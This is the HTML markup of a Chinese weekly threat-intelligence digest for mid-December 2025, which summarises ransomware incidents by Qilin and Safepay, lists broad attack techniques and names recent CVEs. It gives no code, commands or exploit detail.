0.3);" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p yb-mpa-mark="mark-header-title" style="font-weight: bold;font-size: 54px;color: #3C83FA;line-height: 55px;letter-spacing: 3px;word-break: break-word;" data-mid=""><span leaf="">摘要概览</span></p></div><div style="flex-shrink: 0;background: #3C83FA;width: 79px;padding: 3px 0 5px 0;display: flex;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="text-align: center;" data-mid="" mpa-from-tpl="t"><p style="font-weight: bold;font-size: 16px;color: #FFFFFF;line-height: 20px;word-break: break-word;" data-mid=""><span leaf="">每周一篇</span></p></div><div style="text-align: center;align-self: center;background: #FFFFFF;border-radius: 1px;padding: 2px 3px 1px 3px;" data-mid="" mpa-from-tpl="t"><p style="font-weight: bold;font-size: 14px;color: #3C83FA;line-height: 16px;word-break: break-word;" data-mid=""><span leaf="">情报追踪</span></p></div></div></div><div style="display: flex;align-items: flex-start;width: 100%;justify-content: space-between;padding: 18px 0 0 0;" data-mid="" mpa-from-tpl="t"><div style="display: flex;border-width: 1px;border-style: solid;border-color: rgba(40, 44, 51, 0.2);" data-mid="" mpa-from-tpl="t" data-mpa-action-id="md8kr8bk1rdn" data-pm-slice="0 0 []"><div style="text-align: center;padding: 1px 12px 0 9px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;color: #282C33;line-height: 21px;letter-spacing: 1px;word-break: break-word;" data-mid=""><span leaf="" mpa-font-style="md8kr8al1tgn" style="font-size: 14px;">2025年12月</span></p></div><div style="text-align: center;background: #3C83FA;padding: 1px 12px 0 12px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;color: #FFFFFF;line-height: 21px;word-break: break-word;" data-mid=""><span leaf="" mpa-font-style="md8krkjx1e1y" style="font-size: 11px;" data-mpa-action-id="md8krkkyw5a" data-pm-slice="0 0 []">12.8-12.14</span></p></div></div><p style="width: 80px;height: 14px;display: flex;justify-content: center;align-items: center;flex-shrink: 0;margin: 4px 0 0 0;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-imgfileid="100050097" class="rich_pages wxw-img" data-ratio="0.175" data-w="160" src="https://wechat2rss.xlab.app/img-proxy/?k=5a83ae18&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FchaiaZrj8iadrPWzLAFuXVKr31TUA1zIQs9pWSZ5jGicicdj7xjxPibjNcticLgOywtdWGic8tLqJ0fQF39tSd6nWoMXw%2F640%3Ffrom%3Dappmsg%26wx_fmt%3Dpng"/></p></div><p style="width: 10px;height: 9px;display: flex;justify-content: center;align-items: center;margin: 17px 0 -9px 0;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-imgfileid="100050104" class="rich_pages wxw-img" data-ratio="0.9" data-w="20" src="https://wechat2rss.xlab.app/img-proxy/?k=39f68913&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FnLKDrIxQFEEGkn0pFIwOMM5pPQzficCmVP1JWibI5z0miaKzMLYicUZkkF7N1PJkialw9IakBGQumOItHETEaaa0jRw%2F640%3Ffrom%3Dappmsg%26wx_fmt%3Dpng"/></p><div style="width: 100%;text-align: left;padding: 0 17px;" data-mid="" mpa-from-tpl="t" data-mpa-action-id="md8hw5bc23fc" data-pm-slice="0 0 []"><p><span leaf="" mpa-font-style="md8hwswb23en" style="font-size: 16px;" data-mpa-action-id="md8hwswqeph" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">【家族团伙事件】</span></span></p><ul style="list-style-type: square;" class="list-paddingleft-1"><li style="font-size:13px;"><p><span leaf="">Qilin通过加密企业数据索要赎金并造成运营危机</span></p></li><li style="font-size:13px;"><p><span leaf="">Safepay采用双重勒索手段，逼使企业支付高额赎金</span></p></li><li style="font-size:13px;"><p><span leaf="">Luna - Moth团伙网络入侵加密数据发起勒索攻击</span></p></li><li style="font-size:13px;"><p><span leaf="">NoName057利用拒绝服务攻击扰乱目标系统并篡改设置对网站实施破坏</span></p></li><li style="font-size:13px;"><p><span leaf="">INCRansom通过勒索软件发起攻击非法访问并窃取200GB敏感数据</span></p></li></ul><p><span leaf="" mpa-font-style="md8hx4foxsq" style="font-size: 16px;" data-mpa-action-id="md8hx4g416kq" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">【热点攻击手段】</span></span></p><ul style="list-style-type: square;" class="list-paddingleft-1"><li style="font-size:13px;"><p><span leaf="">利用RDP暴露和弱口令为入口渗透受害网络并提权维持持续入侵</span></p></li><li style="font-size:13px;"><p><span leaf="">通过BYOVD技术禁用EDR防护并利用杀毒软件漏洞终止关键服务加密数据</span></p></li><li style="font-size:13px;"><p><span leaf="">利用漏洞部署新型EtherRAT恶意软件，并借助Ethereum智能合约确保持续远程访问和控制</span></p></li><li style="font-size:13px;"><p><span leaf="">公开漏洞与现成工具结合，暴力破解入侵企业并横向渗透加密系统</span></p></li><li style="font-size:13px;"><p><span leaf="">利用受损邮箱账户发送恶意PDF附件进行认证欺诈窃取用户凭证</span></p></li></ul><p><span leaf="" mpa-font-style="md8hxiy01bal" style="font-size: 16px;" data-mpa-action-id="md8hxiyhg7z" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">【重点漏洞情报】</span></span></p><ul style="list-style-type: square;" class="list-paddingleft-1"><li style="font-size:14px;font-weight:normal;"><p><span leaf="">Vite Plugin RSC 远程代码执行漏洞（CVE-2025-67489）</span></p></li><li style="font-size:14px;font-weight:normal;"><p><span leaf="">Langflow 远程代码执行漏洞（CVE-2025-34291）</span></p></li><li style="font-size:14px;font-weight:normal;"><p><span leaf="">Windows Cloud Files Mini Filter Driver 本地权限提升漏洞（CVE-2025-62221）</span></p></li></ul></div><p style="width: 10px;height: 9px;display: flex;justify-content: center;align-items: center;align-self: flex-end;margin: -9px 0 0 0;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-imgfileid="100050102" class="rich_pages wxw-img" data-ratio="0.9" data-w="20" src="https://wechat2rss.xlab.app/img-proxy/?k=343f759b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FlEA1fhJ8dPY8CTT6cndXkb6ur6jwOSHJZrUN8G5PHYmGgEsFZFiaAS4vMZEBibcYNe26PC6afBZcvSWSDxLCzJ9A%2F640%3Ffrom%3Dappmsg%26wx_fmt%3Dpng"/></p></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="title" mpa-from-tpl="t" data-mpa-action-id="md8hmvkqws0"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="margin-bottom: 9px;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><p style="margin: 0 5px 0 9px;" data-mid="" mpa-from-tpl="t"><h1 style="font-size: 26px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 31px;letter-spacing: 4px;-webkit-text-stroke: 2px #222CFF;" data-mid=""><span leaf="">01</span></h1></p></div><div data-mid="" mpa-from-tpl="t"><div data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 22px;letter-spacing: 1px;" data-mid=""><span leaf="" mpa-font-style="md8in1abcbk" style="font-size: 20px;" data-mpa-action-id="md8in1bg1b37" data-pm-slice="0 0 []">家族团伙事件</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8lv9e2vk7"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 5 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8lv9e2vk7&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex; justify-content: center; align-items: center; width: 100%;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8marrbmy6" style="font-size: 32px;" data-mpa-action-id="md8mars91cih" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">01</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">Qilin通过加密企业数据索要赎金并造成运营危机</span></span></p></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li style="font-size:14px;"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;list&#34;,{&#34;type&#34;:&#34;ul&#34;,&#34;style&#34;:&#34;list-style-type: circle;&#34;,&#34;class&#34;:&#34;list-paddingleft-1&#34;,&#34;start&#34;:null},&#34;listitem&#34;,{&#34;style&#34;:&#34;font-size:14px;&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-weight: bold;">家族团伙别名：</span></span></p></div><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;text-align: left;"><span leaf="">Water Galura, Agenda Ransomware Group</span></span></p></div></li><li style="font-size:14px;"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p style="text-align: left;"><span style="font-weight: bold;text-align: justify;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf="">家族团伙主要影响行业：</span></span></p></div><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;text-align: justify;"><span leaf="">互联网技术服务, 物流, 教育, 电信运营商, 医疗, 交通, 农林牧渔, 政法, 汽车, 金融, 建筑与不动产</span></span></p></div></li><li><p><span mpa-font-style="md8j92uo17j9" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.hendryadrian.com/ransom-hexacon-construction/" target="_blank">https://www.hendryadrian.com/ransom-hexacon-construction/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;" data-mpa-action-id="md8j92vi11y1"><span leaf=""><span textstyle="" style="font-size: 14px;">2025 年 12 月 9 日，Hexacon Construction遭遇勒索软件攻击，攻击由Qilin威胁组织发起。攻击者通过加密企业多个数据文件，限制其数据访问权限，并提出赎金要求，导致企业正常运营严重受影响，面临明显业务中断与潜在经济损失。目前公开信息仅明确攻击性质，未披露具体入侵路径、技术手段及勒索软件相关细节，攻击者也未留下指向攻击细节的线索，对企业持续运营构成较大威胁。</span></span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="8 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8lv9e2vk7"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 5 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8lv9e2vk7&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex; justify-content: center; align-items: center; width: 100%;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8marrbmy6" style="font-size: 32px;" data-mpa-action-id="md8mars91cih" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">02</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">Safepay采用双重勒索手段，逼使企业支付高额赎金</span></span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><p style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><ul style="list-style-type: circle;" class="list-paddingleft-1"><li style="font-size:14px;"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p style="text-align: left;"><span leaf="" style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span textstyle="" style="letter-spacing: 0.034em;background-color: transparent;font-weight: bold;">家族团伙</span><span textstyle="" style="font-weight: bold;">主要影响行业：</span></span></p></div><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;text-align: justify;"><span leaf="">互联网技术服务, 教育, 农林牧渔, 汽车, 金融, 建筑与不动产</span></span></p></div></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8j92uo17j9" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.hendryadrian.com/safepay-ransomware-group-breaches-us-engineering-firm-chemstress/" target="_blank">https://www.hendryadrian.com/safepay-ransomware-group-breaches-us-engineering-firm-chemstress/</a></span></span></p></li></ul></p></div></div><p style="text-indent: 2em;margin-top: 24px;text-align: left;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 14px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mef52r511pda" data-mpa-action-id="mef52r5b7jz" data-pm-slice="0 0 []">Safepay 勒索软件组织对一家工程与施工企业发起网络攻击，采用双重勒索策略：先通过疑似系统漏洞或弱口令渗透企业网络，窃取涉及相关项目的敏感数据，再加密关键文件干扰正常业务。随后，该组织将部分窃取数据公布于勒索门户，设定截止期限并威胁逾期公开全部数据，迫使企业支付赎金。此次攻击暴露了目标企业信息安全防护漏洞，也反映出相关行业网络安全挑战的升级态势。攻击可能导致企业面临重大经济损失、声誉受损、业务中断，敏感数据外泄还可能引发法律合规问题及后续安全隐患，对项目管理和客户信任造成持续影响。</span></p></div></div></div></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j9i4u1nvn"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="8 3 